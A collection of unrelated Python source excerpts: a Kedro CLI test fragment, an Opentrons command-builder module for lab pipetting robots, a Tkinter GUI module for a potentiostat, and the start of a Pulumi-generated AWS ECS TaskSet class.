mocker.call("pip", ["install", "src/[docs]"]),
mocker.call("pip", ["install", "-r", "src/requirements.txt"]),
mocker.call("ipykernel", ["install", "--user", "--name=fake_package"]),
]
)
fake_rmtree.assert_called_once_with("docs/build", ignore_errors=True)
@pytest.mark.parametrize("open_flag", ["-o", "--open"])
def test_open_docs(self, open_flag, fake_kedro_cli, mocker):
patched_browser = mocker.patch("webbrowser.open")
result = CliRunner().invoke(fake_kedro_cli.cli, ["build-docs", open_flag])
assert not result.exit_code, result.stdout
expected_path = (Path.cwd() / "docs" / "build" / "html" / "index.html").as_uri()
patched_browser.assert_called_once_with(expected_path)
class TestBuildReqsCommand:
def test_requirements_file_exists(self, python_call_mock, fake_kedro_cli, mocker):
# File exists:
mocker.patch.object(Path, "is_file", return_value=True)
result = CliRunner().invoke(fake_kedro_cli.cli, ["build-reqs"])
assert not result.exit_code, result.stdout
assert "Requirements built!" in result.stdout
python_call_mock.assert_called_once_with(
"piptools", ["compile", str(Path.cwd() / | |
<reponame>Axel-Jacobsen/opentrons<gh_stars>1-10
from datetime import timedelta
from . import types as command_types
from opentrons.broker import Broker
import functools
import inspect
from typing import Union, Sequence, List, Any, Optional, TYPE_CHECKING
from opentrons.legacy_api.containers import (Well as OldWell,
Container as OldContainer,
Slot as OldSlot,
location_to_list)
from opentrons.protocol_api.labware import Well
from opentrons.protocols.api_support.util import FlowRates
from opentrons.types import Location
from opentrons.drivers import utils
if TYPE_CHECKING:
from opentrons.protocol_api.instrument_context import InstrumentContext
Apiv2Locations = Sequence[Union[Location, Well]]
Apiv2Instruments = Sequence['InstrumentContext']
def is_new_loc(location: Union[Location, Well, None,
OldWell, OldContainer,
OldSlot, Sequence]) -> bool:
return isinstance(listify(location)[0], (Location, Well))
def listify(location: Any) -> List:
if isinstance(location, list):
try:
return listify(location[0])
except IndexError:
return [location]
else:
return [location]
class CommandPublisher:
def __init__(self, broker):
self._broker = broker or Broker()
@property
def broker(self):
return self._broker
@broker.setter
def broker(self, broker):
self._broker = broker
def _stringify_new_loc(loc: Union[Location, Well]) -> str:
if isinstance(loc, Location):
if loc.labware.is_empty:
return str(loc.point)
else:
return repr(loc.labware)
elif isinstance(loc, Well):
return str(loc)
else:
raise TypeError(loc)
def _stringify_legacy_loc(loc: Union[OldWell, OldContainer,
OldSlot, None]) -> str:
def get_slot(location):
trace = location.get_trace()
for item in trace:
if isinstance(item, OldSlot):
return item.get_name()
elif isinstance(item, str):
return item
return '?'
type_to_text = {
OldSlot: 'slot',
OldContainer: 'container',
OldWell: 'well',
}
# Coordinates only
if loc is None:
return '?'
location = location_to_list(loc)
multiple = len(location) > 1
return '{object_text}{suffix} {first}{last} in "{slot_text}"'.format(
object_text=type_to_text[type(location[0])],
suffix='s' if multiple else '',
first=location[0].get_name(),
last='...'+location[-1].get_name() if multiple else '',
slot_text=get_slot(location[0])
)
def combine_locations(location: Sequence) -> str:
if len(location) > 1:
loc1 = stringify_location(location[0])
loc2 = stringify_location(location[1])
return f'{loc1} and {loc2}'
elif len(location) == 1:
loc1 = stringify_location(location[0])
return f'{loc1}'
else:
return ''
def stringify_location(location: Union[Location, None,
OldWell, OldContainer,
OldSlot, Sequence]) -> str:
if is_new_loc(location):
loc_str_list = [_stringify_new_loc(loc)
for loc in listify(location)]
return ', '.join(loc_str_list)
else:
return _stringify_legacy_loc(location) # type: ignore
def make_command(name, payload):
return {'name': name, 'payload': payload}
def home(mount):
text = 'Homing pipette plunger on mount {mount}'.format(mount=mount)
return make_command(
name=command_types.HOME,
payload={
'axis': mount,
'text': text
}
)
def aspirate(instrument, volume, location, rate):
location_text = stringify_location(location)
template = 'Aspirating {volume} uL from {location} at {flow} uL/sec'
try:
flow_rate = rate * FlowRates(instrument).aspirate
text = template.format(
volume=float(volume), location=location_text, flow=flow_rate)
except AttributeError:
flow_mms = instrument.speeds['aspirate']
flow_ulsec = flow_mms * instrument._ul_per_mm(instrument.max_volume,
'aspirate')
flow_rate = rate * flow_ulsec
flow_rate = round(flow_rate, 1)
text = template.format(
volume=float(volume), location=location_text, flow=flow_rate)
return make_command(
name=command_types.ASPIRATE,
payload={
'instrument': instrument,
'volume': volume,
'location': location,
'rate': rate,
'text': text
}
)
def paired_aspirate(
instruments: Apiv2Instruments, volume: float,
locations: Apiv2Locations, rate: float,
pub_type: str):
loc_text = combine_locations(locations)
flow_rate = min(
rate * FlowRates(instr).aspirate for instr in instruments)
text_type = f'{pub_type}: Aspirating '
text_content = f'{volume} uL from {loc_text} at {flow_rate} uL/sec'
text = text_type + text_content
return make_command(
name=command_types.ASPIRATE,
payload={
'instruments': instruments,
'volume': volume,
'locations': locations,
'rate': rate,
'text': text
}
)
def dispense(instrument, volume, location, rate):
location_text = stringify_location(location)
template = 'Dispensing {volume} uL into {location} at {flow} uL/sec'
try:
flow_rate = rate * FlowRates(instrument).dispense
text = template.format(
volume=float(volume), location=location_text, flow=flow_rate)
except AttributeError:
flow_mms = instrument.speeds['dispense']
flow_ulsec = flow_mms * instrument._ul_per_mm(instrument.max_volume,
'dispense')
flow_rate = rate * flow_ulsec
flow_rate = round(flow_rate, 1)
text = template.format(
volume=float(volume), location=location_text, flow=flow_rate)
return make_command(
name=command_types.DISPENSE,
payload={
'instrument': instrument,
'volume': volume,
'location': location,
'rate': rate,
'text': text
}
)
def paired_dispense(
instruments: Apiv2Instruments, volume: float,
locations: Apiv2Locations, rate: float,
pub_type: str):
loc_text = combine_locations(locations)
flow_rate = min(
rate * FlowRates(instr).dispense for instr in instruments)
text_type = f'{pub_type}: Dispensing '
text_content = f'{volume} uL into {loc_text} at {flow_rate} uL/sec'
text = text_type + text_content
return make_command(
name=command_types.ASPIRATE,
payload={
'instruments': instruments,
'volume': volume,
'locations': locations,
'rate': rate,
'text': text
}
)
def consolidate(instrument, volume, source, dest):
text = 'Consolidating {volume} from {source} to {dest}'.format(
volume=transform_volumes(volume),
source=stringify_location(source),
dest=stringify_location(dest)
)
if is_new_loc(source):
# Dest is assumed as new location too
locations = [] + listify(source) + listify(dest)
else:
# incase either source or dest is list of tuple location
# strip both down to simply lists of Placeables
locations = [] + location_to_list(source) + location_to_list(dest)
return make_command(
name=command_types.CONSOLIDATE,
payload={
'instrument': instrument,
'locations': locations,
'volume': volume,
'source': source,
'dest': dest,
'text': text
}
)
def distribute(instrument, volume, source, dest):
text = 'Distributing {volume} from {source} to {dest}'.format(
volume=transform_volumes(volume),
source=stringify_location(source),
dest=stringify_location(dest)
)
if is_new_loc(source):
# Dest is assumed as new location too
locations = [] + listify(source) + listify(dest)
else:
# incase either source or dest is list of tuple location
# strip both down to simply lists of Placeables
locations = [] + location_to_list(source) + location_to_list(dest)
return make_command(
name=command_types.DISTRIBUTE,
payload={
'instrument': instrument,
'locations': locations,
'volume': volume,
'source': source,
'dest': dest,
'text': text
}
)
def transfer(instrument, volume, source, dest):
text = 'Transferring {volume} from {source} to {dest}'.format(
volume=transform_volumes(volume),
source=stringify_location(source),
dest=stringify_location(dest)
)
if is_new_loc(source):
# Dest is assumed as new location too
locations = [] + listify(source) + listify(dest)
else:
# incase either source or dest is list of tuple location
# strip both down to simply lists of Placeables
locations = [] + location_to_list(source) + location_to_list(dest)
return make_command(
name=command_types.TRANSFER,
payload={
'instrument': instrument,
'locations': locations,
'volume': volume,
'source': source,
'dest': dest,
'text': text
}
)
def comment(msg):
text = msg
return make_command(
name=command_types.COMMENT,
payload={
'text': text
}
)
def transform_volumes(volumes):
if not isinstance(volumes, list):
return float(volumes)
else:
return [float(vol) for vol in volumes]
def mix(instrument, repetitions, volume, location):
text = 'Mixing {repetitions} times with a volume of {volume} ul'.format(
repetitions=repetitions, volume=float(volume)
)
return make_command(
name=command_types.MIX,
payload={
'instrument': instrument,
'location': location,
'volume': volume,
'repetitions': repetitions,
'text': text
}
)
def paired_mix(
instruments: Apiv2Instruments, locations: Apiv2Locations,
repetitions: int, volume: float, pub_type: str):
text_type = f'{pub_type}: Mixing '
text_content = '{repetitions} times with a volume of {volume} ul'
text = text_type + text_content
return make_command(
name=command_types.MIX,
payload={
'instruments': instruments,
'locations': locations,
'volume': volume,
'repetitions': repetitions,
'text': text
}
)
def blow_out(instrument, location):
location_text = stringify_location(location)
text = 'Blowing out'
if location is not None:
text += ' at {location}'.format(location=location_text)
return make_command(
name=command_types.BLOW_OUT,
payload={
'instrument': instrument,
'location': location,
'text': text
}
)
def paired_blow_out(
instruments: Apiv2Instruments,
locations: Optional[Apiv2Locations],
pub_type: str):
text = f'{pub_type}: Blowing out'
if locations is not None:
location_text = combine_locations(locations)
text += f' at {location_text}'
return make_command(
name=command_types.BLOW_OUT,
payload={
'instruments': instruments,
'locations': locations,
'text': text
}
)
def touch_tip(instrument):
text = 'Touching tip'
return make_command(
name=command_types.TOUCH_TIP,
payload={
'instrument': instrument,
'text': text
}
)
def paired_touch_tip(
instruments: Apiv2Instruments,
locations: Optional[Apiv2Locations],
pub_type: str):
text = f'{pub_type}: Touching tip'
if locations is not None:
location_text = combine_locations(locations)
text += f' at {location_text}'
return make_command(
name=command_types.TOUCH_TIP,
payload={
'instruments': instruments,
'locations': locations,
'text': text
}
)
def air_gap():
text = 'Air gap'
return make_command(
name=command_types.AIR_GAP,
payload={
'text': text
}
)
def return_tip():
text = 'Returning tip'
return make_command(
name=command_types.RETURN_TIP,
payload={
'text': text
}
)
def pick_up_tip(instrument, location):
location_text = stringify_location(location)
text = 'Picking up tip from {location}'.format(location=location_text)
return make_command(
name=command_types.PICK_UP_TIP,
payload={
'instrument': instrument,
'location': location,
'text': text
}
)
def paired_pick_up_tip(
instruments: Apiv2Instruments,
locations: Apiv2Locations, pub_type: str):
location_text = combine_locations(locations)
text = f'{pub_type}: Picking up tip from {location_text}'
return make_command(
name=command_types.PICK_UP_TIP,
payload={
'instruments': instruments,
'locations': locations,
'text': text
}
)
def drop_tip(instrument, location):
location_text = stringify_location(location)
text = 'Dropping tip into {location}'.format(location=location_text)
return make_command(
name=command_types.DROP_TIP,
payload={
'instrument': instrument,
'location': location,
'text': text
}
)
def paired_drop_tip(
instruments: Apiv2Instruments,
locations: Apiv2Locations, pub_type: str):
location_text = combine_locations(locations)
text = f'{pub_type}: Dropping tip into {location_text}'
return make_command(
name=command_types.DROP_TIP,
payload={
'instruments': instruments,
'locations': locations,
'text': text
}
)
def magdeck_engage():
text = "Engaging Magnetic Module"
return make_command(
name=command_types.MAGDECK_ENGAGE,
payload={'text': text}
)
def magdeck_disengage():
text = "Disengaging Magnetic Module"
return make_command(
name=command_types.MAGDECK_DISENGAGE,
payload={'text': text}
)
def magdeck_calibrate():
text = "Calibrating Magnetic Module"
return make_command(
name=command_types.MAGDECK_CALIBRATE,
payload={'text': text}
)
def tempdeck_set_temp(celsius):
text = "Setting Temperature Module temperature " \
"to {temp} °C (rounded off to nearest integer)".format(
temp=round(float(celsius),
utils.TEMPDECK_GCODE_ROUNDING_PRECISION))
return make_command(
name=command_types.TEMPDECK_SET_TEMP,
payload={
'celsius': celsius,
'text': text
}
)
def tempdeck_await_temp(celsius):
text = "Waiting for Temperature Module to reach temperature " \
"{temp} °C (rounded off to nearest integer)".format(
temp=round(float(celsius),
utils.TEMPDECK_GCODE_ROUNDING_PRECISION))
return make_command(
name=command_types.TEMPDECK_AWAIT_TEMP,
payload={
'celsius': celsius,
'text': text
}
)
def tempdeck_deactivate():
text = "Deactivating Temperature Module"
return make_command(
name=command_types.TEMPDECK_DEACTIVATE,
payload={'text': text}
)
def thermocycler_open():
text = "Opening Thermocycler lid"
return make_command(
name=command_types.THERMOCYCLER_OPEN,
payload={'text': text}
)
def thermocycler_set_block_temp(temperature,
hold_time_seconds,
hold_time_minutes):
temp = round(float(temperature), utils.TC_GCODE_ROUNDING_PRECISION)
text = f'Setting Thermocycler well block temperature to {temp} | |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Support module generated by PAGE version 4.20
# in conjunction with Tcl version 8.6
# Feb 18, 2019 11:55:48 AM -03 platform: Windows NT
# Feb 19, 2019 09:09:42 AM -03 platform: Windows NT
"""
Created on Mon Feb 18 10:08:04 2019
@author: <NAME>
"""
import sys
import Controller as ctrl
import Model as md
import Estilos as es
import numpy as np
#from numpy import array, concatenate, ndarray, append, take, delete
import pandas as pd
from tkinter import filedialog, colorchooser, IntVar
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
def set_var():
global conn, qtdMin, curvePlot, curvesList, cBoxList, md_dpv, validation
conn = 0
qtdMin = 0
curvePlot = np.ndarray([])
curvesList = np.ndarray([])
cBoxList = np.ndarray([])
md_dpv = md.dpv()
validation = ctrl.validation(w, root)
def init(top, gui, *args, **kwargs):
global w, top_level, root, font9
w = gui
top_level = top
root = top
#font9 = "-family {Segoe UI} -size 9 -weight bold -slant roman " \
# "-underline 0 -overstrike 0"
set_var()
painelDPV()
def destroy_window():
# Function which closes the window.
global top_level
top_level.destroy()
top_level = None
if __name__ == '__main__':
import VStat
VStat.vp_start_gui()
########## Funções ###########
def createCanvas():
w.cv_curveGraph = tk.Canvas(w.fr_mainView)
w.cv_curveGraph.place(relx=0.012, rely=0.119, relheight=0.857, relwidth=0.974)
w.cv_curveGraph.configure(background="#ffffff")
w.cv_curveGraph.configure(highlightbackground="#ffffff")
w.cv_curveGraph.configure(highlightcolor="black")
w.cv_curveGraph.configure(insertbackground="black")
w.cv_curveGraph.configure(relief='ridge')
w.cv_curveGraph.configure(selectbackground="#c4c4c4")
w.cv_curveGraph.configure(selectforeground="black")
w.cv_curveGraph.configure(width=823)
w.fr_toolbar = tk.Frame(w.fr_mainView)
w.fr_toolbar.place(relx=0.012, rely=0.02, height=38, relwidth=0.974)
w.fr_toolbar.configure(relief='groove')
w.fr_toolbar.configure(borderwidth="2")
w.fr_toolbar.configure(relief='groove')
w.fr_toolbar.configure(background="#f9f9f9")
w.fr_toolbar.configure(highlightbackground="#f9f9f9")
w.fr_toolbar.configure(highlightcolor="black")
w.fr_toolbar.configure(width=823)
def btn_import(p1):
global curvesList, curvePlot, spAt, cnvAt
curvePlot = np.ndarray([])
curvesList = np.ndarray([])
imp = filedialog.askopenfilename(initialdir = "C:/", title = "Importar CSV...",
filetypes = (("Comma-separeted values", "*.csv"),
("All files", "*.*")))
if imp:
csv = ctrl.file.importCsv(imp)
top_level.title("VStat - " + csv.curveName + ".csv")
curvePlot = np.append(curvePlot, csv, axis=None)
spAt, cnvAt = drawCurve()
cnvAt.draw()
curvesList = np.append(curvesList, csv, axis=None)
createMins()
def btn_export(p1):
global curvePlot
if curvePlot.size == 2:
csvName = filedialog.asksaveasfilename(title='Exportar CSV...', defaultextension = 'csv', initialdir = "C:/", filetypes = (("Comma-separeted values", "*.csv"), ("All files", "*.*")))
ctrl.file.exportCsv(np.take(curvePlot, 1), csvName)
elif curvePlot.size > 2:
w.lb_ConnInfo.configure(text="Ainda não é possível\nexportar curvas unidas")
elif curvePlot.size < 2:
w.lb_ConnInfo.configure(text="Sem curva para\nexportar")
def btn_connect(p1):
global conn
if conn:
ctrl.connection.disconnect()
conn = 0
w.btn_connect.configure(text='''Conectar''', background="#738c8c")
w.btn_connect.update()
w.lb_ConnInfo.configure(text="VStat desconectado")
else:
vstat = ctrl.connection.connect()
if vstat:
conn = 1
w.lb_ConnInfo.configure(text="VStat conectado\nPorta "+vstat)
w.btn_connect.configure(text='''Desconectar''', background="#00cccc")
w.btn_connect.update()
else:
w.lb_ConnInfo.configure(text="VStat não encontrado")
def btn_iniciar(p1):
global curvePlot, curvesList, spAt, cnvAt, md_dpv
md_dpv.pIni = w.et_PInicio.get()
md_dpv.pFim = w.et_PFim.get()
md_dpv.pPul = w.et_PPulso.get()
md_dpv.pPas = w.et_PPasso.get()
md_dpv.tPul = w.et_TPulso.get()
md_dpv.tPas = w.et_tPasso.get()
md_dpv.tEqu = w.et_tEquil.get()
md_dpv.fEsc = w.cb_intCorrente.current()
# Limpa o frame de miniaturas
destroyChildren(w.fr_miniaturas)
w.fr_miniaturas.update()
# Verifica se o potenciostato está conectado e inicia a análise
ini = ctrl.connection.openPort()
if ini:
w.lb_ConnInfo.configure(text="VStat não conectado")
w.btn_connect.configure(background="#ff6666")
w.btn_connect.update()
else:
"""x = np.arange(float(w.et_PInicio.get()), float(w.et_PFim.get()), float(w.et_PPasso.get()))
y = np.arange(0, x.size, 1)
c = md.curve("live Plot", x, y)
curvePlot = np.append(curvePlot, c)"""
ctrl.transmition.transmit(str(w.cb_intCorrente.current()),
w.et_PInicio.get(),
w.et_PFim.get(),
w.et_PPulso.get(),
w.et_PPasso.get(),
w.et_TPulso.get(),
w.et_tPasso.get(),
w.et_tEquil.get())
destroyChildren(w.fr_mainView)
# Fundo de escala
if w.cb_intCorrente.current() == 0:
fe = 5/(4096/3.3)
print("Escala: Automática")
print("fundo de escala(inicial): ", fe)
else:
fe = int(w.cb_intCorrente.get()[4:-2])/(4096/3.3)
print("Escala: ", w.cb_intCorrente.get()[4:-2])
print("fundo de escala: ", fe)
curvePlot = np.ndarray([])
curvePlot = np.append(curvePlot, md.curve("", np.array([]), np.array([])))
spAt, cnvAt = drawCurve()
curvesList = ctrl.transmition.receive(curvePlot, spAt, cnvAt, fe, float(w.et_PInicio.get()), float(w.et_PPasso.get()))#, canvas)
#curvePlot = np.append(curvePlot, np.take(curvesList, 1))
ctrl.connection.closePort()
#if dpv:
top_level.title("VStat - " + np.take(curvePlot, 1).curveName)#dpv.curveName)
#createCanvas()
#spAt, cnvAt = drawCurve()
createMins()
def drawCurve():
global curvePlot, sp, fig
createCanvas()
fig = Figure(figsize=(10, 8), dpi = 100)
sp = fig.add_subplot(111, xlabel="Potencial em Volts (V)", ylabel="Corrente em Microampere (µA)")#, title=cv.curveName)
canvas = FigureCanvasTkAgg(fig, master = w.cv_curveGraph)
toolbar = NavigationToolbar2Tk(canvas, w.fr_toolbar)
if curvePlot.size == 2:
cv = np.take(curvePlot, 1)
sp.set_title(cv.curveName)
sp.plot(cv.curveX, cv.curveY, color=cv.color)
elif curvePlot.size > 2:
sp.set_title("untitle merge")
for i in range(1, curvePlot.size):
cv = np.take(curvePlot, i)
sp.plot(cv.curveX, cv.curveY, color=cv.color)
toolbar.update()
canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)
#canvas.draw()
canvas.get_tk_widget().pack(side = tk.TOP, fill = tk.BOTH, expand = 1)
return sp, canvas
def expandMin(curveIndex):
global curvesList, curvePlot, spAt, cnvAt
cv = np.take(curvesList, curveIndex+1)
curvePlot = np.ndarray([])
curvePlot = np.append(curvePlot, cv, axis=None)
spAt, cnvAt = drawCurve()
def createMins():
global cBoxList, curvesList, qtdMin
# Apaga miniaturas existentes
qtdMin = 0
destroyChildren(w.fr_miniaturas)
# Cria miniaturas para cada curva na lista
for i in range(1, curvesList.size):
curve = np.take(curvesList, i)
createMin(curve)
def createMin(curve):
global qtdMin, cBoxList
cBoxList = np.append(cBoxList, IntVar(), axis=None)
thisIndex = qtdMin
relX = 0.01
if qtdMin == 0:
qtdMin += 1
elif qtdMin > 0:
relX = (0.152 * qtdMin) + 0.01
qtdMin += 1
# Titulo superior das miniaturas
w.lb_minCurve = tk.Label(w.fr_miniaturas)
w.lb_minCurve.place(relx=relX, rely=0.058, height=21, width=133)
w.lb_minCurve.configure(background="#d9d9d9")
w.lb_minCurve.configure(disabledforeground="#a3a3a3")
w.lb_minCurve.configure(foreground="#000000")
w.lb_minCurve.configure(text=curve.curveName)
w.lb_minCurve.configure(width=133)
w.lb_minCurve.bind("<Button-1>", lambda x:expandMin(thisIndex))
# Canvas para desenhar a miniatura
w.cv_minCurve = tk.Canvas(w.fr_miniaturas)
w.cv_minCurve.place(relx=relX, rely=0.165, height=112, width=133)
fig = Figure(figsize=(1, 1), dpi = 100)
canvas = FigureCanvasTkAgg(fig, master = w.cv_minCurve)
#toolbar = NavigationToolbar2Tk(canvas, w.fr_toolbar)
sp = fig.add_subplot(111)
sp.plot(curve.curveX, curve.curveY)
#toolbar.update()
#canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)
canvas.mpl_connect('button_press_event', lambda x: expandMin(thisIndex))
w.cb_chooser = tk.Checkbutton(w.cv_minCurve)
w.cb_chooser.place(relx=0.075, rely=0.097, relheight=0.243, relwidth=0.211)
w.cb_chooser.configure(activebackground="#ececec")
w.cb_chooser.configure(activeforeground="#000000")
w.cb_chooser.configure(background="#d9d9d9")
w.cb_chooser.configure(disabledforeground="#a3a3a3")
w.cb_chooser.configure(foreground="#000000")
w.cb_chooser.configure(highlightbackground="#d9d9d9")
w.cb_chooser.configure(highlightcolor="black")
w.cb_chooser.configure(justify='left')
w.cb_chooser.configure(variable=np.take(cBoxList, thisIndex+1))
w.fr_color = tk.Frame(w.cv_minCurve)
w.fr_color.place(relx=0.752, rely=0.097, relheight=0.243, relwidth=0.188)
w.fr_color.configure(relief='groove')
w.fr_color.configure(borderwidth="2")
w.fr_color.configure(relief='groove')
w.fr_color.configure(background="#1559c6")
w.fr_color.configure(width=25)
w.fr_color.bind("<Button-1>", lambda e:changeColor(e, thisIndex, sp, canvas))
def destroyChildren(frame):
for child in frame.winfo_children():
if child.winfo_children():
destroyChildren(child)
child.destroy()
def changeColor(p1, curveIndex, sp, canvas):
global curvesList, curvePlot
color = colorchooser.askcolor()
c = str(color)
c = c[-9:-2]
cv = np.take(curvesList, curveIndex+1)
cv.color = c
sp.plot(cv.curveX, cv.curveY, c)
canvas.draw()
p1.widget.configure(background=cv.color)
p1.widget.update()
drawCurve()
def curvesJoin():
global curvePlot
count = 0
for i in range(1, cBoxList.size):
c = np.take(cBoxList, i)
if c.get():
if count < 1:
cv = np.take(curvesList, i)
curvePlot = np.ndarray([])
curvePlot = np.append(curvePlot, cv, axis=None)
count += 1
else:
cv = np.take(curvesList, i)
curvePlot = np.append(curvePlot, cv, axis=None)
count += 1
c.set(0)
if count <= 1:
w.lb_ConnInfo.configure(text="Selecione ao menos\nduas curvas")
else:
drawCurve()
def removeCurve():
global curvesList, cBoxList, curvePlot
#print("remover")
i = 1
while i < cBoxList.size:
c = np.take(cBoxList, i)
t = np.take(curvesList, i)
p = np.take(curvePlot, 1)
if t is p:
#print("Igual")
pass
#print("c: "+ str(c.get()))
if c.get():
#if t is p:
curvesList = np.delete(curvesList, i)
cBoxList = np.delete(cBoxList, i)
else:
i += 1
createMins()
#-----------------------------------------------------#
# PAINEIS #
#-----------------------------------------------------#
#---- Painel DPV ----#
def painelDPV():
global md_dpv
destroyChildren(w.fr_analise)
w.fr_analise.configure(text='''DPV''')
vcmd = w.fr_analise.register(validation.entryValidate)
# Inicializa entradas que serão manipuladas
w.et_PInicio = tk.Entry(w.fr_analise)
w.et_PFim = tk.Entry(w.fr_analise)
w.et_PPasso = tk.Entry(w.fr_analise)
w.et_tPasso = tk.Entry(w.fr_analise)
w.lb_PInicio = tk.Label(w.fr_analise, anchor="w")
w.lb_PInicio.place(relx=0.053, y=17, height=21, width=91
, bordermode='ignore')
es.lbStyle(w.lb_PInicio)
w.lb_PInicio.configure(text='''Pot. Inicial (V)''')
w.et_PInicio.configure(validate="key")
w.et_PInicio.configure(validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_PInicio.place(relx=0.59, y=18, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_PInicio)
ctrl.validation.entryInsert(w.et_PInicio, md_dpv.pIni)
w.lb_PFim = tk.Label(w.fr_analise, anchor="w")
w.lb_PFim.place(relx=0.053, y=43, height=21, width=91
, bordermode='ignore')
es.lbStyle(w.lb_PFim)
w.lb_PFim.configure(text='''Pot. Final (V)''')
w.lb_PFim.configure(width=71)
w.et_PFim.configure(validate="key")
w.et_PFim.configure(validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_PFim.place(relx=0.59, y=44, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_PFim)
ctrl.validation.entryInsert(w.et_PFim, md_dpv.pFim)
w.lb_PPasso = tk.Label(w.fr_analise, anchor="w")
w.lb_PPasso.place(relx=0.053, y=69, height=21, width=91
, bordermode='ignore')
es.lbStyle(w.lb_PPasso)
w.lb_PPasso.configure(text='''Pot. Passo (V)''')
w.lb_PPasso.configure(width=81)
w.et_PPasso.configure(validate="key")
w.et_PPasso.configure(validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_PPasso.place(relx=0.59, y=70, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_PPasso)
ctrl.validation.entryInsert(w.et_PPasso, md_dpv.pPas)
w.lb_PPulso = tk.Label(w.fr_analise, anchor="w")
w.lb_PPulso.place(relx=0.053, y=95, height=21, width=91
, bordermode='ignore')
es.lbStyle(w.lb_PPulso)
w.lb_PPulso.configure(text='''Pot. Pulso (V)''')
w.et_PPulso = tk.Entry(w.fr_analise, validate="key", validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_PPulso.place(relx=0.59, y=96, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_PPulso)
ctrl.validation.entryInsert(w.et_PPulso, md_dpv.pPul)
w.lb_TPulso = tk.Label(w.fr_analise, anchor="w")
w.lb_TPulso.place(relx=0.053, y=121, height=21, width=91
, bordermode='ignore')
es.lbStyle(w.lb_TPulso)
w.lb_TPulso.configure(text='''Tem. Pulso (s)''')
w.lb_TPulso.configure(width=91)
w.et_TPulso = tk.Entry(w.fr_analise, validate="key", validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_TPulso.place(relx=0.59, y=122, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_TPulso)
ctrl.validation.entryInsert(w.et_TPulso, md_dpv.tPul)
w.lb_tPasso = tk.Label(w.fr_analise, anchor="w")
w.lb_tPasso.place(relx=0.053, y=147, height=21, width=91
, bordermode='ignore')
es.lbStyle(w.lb_tPasso)
w.lb_tPasso.configure(text='''Tem. Passo (s)''')
w.et_tPasso.configure(validate="key")
w.et_tPasso.configure(validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_tPasso.place(relx=0.59, y=148, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_tPasso)
ctrl.validation.entryInsert(w.et_tPasso, md_dpv.tPas)
w.lb_tEquil = tk.Label(w.fr_analise, anchor="w")
w.lb_tEquil.place(relx=0.053, y=173, height=21, width=110
, bordermode='ignore')
es.lbStyle(w.lb_tEquil)
w.lb_tEquil.configure(text='''Tem. equilíbrio (s)''')
w.et_tEquil = tk.Entry(w.fr_analise, validate="key", validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_tEquil.place(relx=0.59, y=174, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_tEquil)
ctrl.validation.entryInsert(w.et_tEquil, md_dpv.tEqu)
w.lb_currentRange = tk.Label(w.fr_analise, anchor="w")
w.lb_currentRange.place(relx=0.053, y=199, height=21, width=91
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['TaskSetArgs', 'TaskSet']
@pulumi.input_type
class TaskSetArgs:
def __init__(__self__, *,
cluster: pulumi.Input[str],
service: pulumi.Input[str],
task_definition: pulumi.Input[str],
external_id: Optional[pulumi.Input[str]] = None,
launch_type: Optional[pulumi.Input['TaskSetLaunchType']] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input['TaskSetLoadBalancerArgs']]]] = None,
network_configuration: Optional[pulumi.Input['TaskSetNetworkConfigurationArgs']] = None,
platform_version: Optional[pulumi.Input[str]] = None,
scale: Optional[pulumi.Input['TaskSetScaleArgs']] = None,
service_registries: Optional[pulumi.Input[Sequence[pulumi.Input['TaskSetServiceRegistryArgs']]]] = None):
"""
The set of arguments for constructing a TaskSet resource.
:param pulumi.Input[str] cluster: The short name or full Amazon Resource Name (ARN) of the cluster that hosts the service to create the task set in.
:param pulumi.Input[str] service: The short name or full Amazon Resource Name (ARN) of the service to create the task set in.
:param pulumi.Input[str] task_definition: The short name or full Amazon Resource Name (ARN) of the task definition for the tasks in the task set to use.
:param pulumi.Input[str] external_id: An optional non-unique tag that identifies this task set in external systems. If the task set is associated with a service discovery registry, the tasks in this task set will have the ECS_TASK_SET_EXTERNAL_ID AWS Cloud Map attribute set to the provided value.
:param pulumi.Input['TaskSetLaunchType'] launch_type: The launch type that new tasks in the task set will use. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/launch_types.html in the Amazon Elastic Container Service Developer Guide.
:param pulumi.Input[str] platform_version: The platform version that the tasks in the task set should use. A platform version is specified only for tasks using the Fargate launch type. If one isn't specified, the LATEST platform version is used by default.
:param pulumi.Input['TaskSetScaleArgs'] scale: A floating-point percentage of the desired number of tasks to place and keep running in the task set.
:param pulumi.Input[Sequence[pulumi.Input['TaskSetServiceRegistryArgs']]] service_registries: The details of the service discovery registries to assign to this task set. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/service-discovery.html.
"""
pulumi.set(__self__, "cluster", cluster)
pulumi.set(__self__, "service", service)
pulumi.set(__self__, "task_definition", task_definition)
if external_id is not None:
pulumi.set(__self__, "external_id", external_id)
if launch_type is not None:
pulumi.set(__self__, "launch_type", launch_type)
if load_balancers is not None:
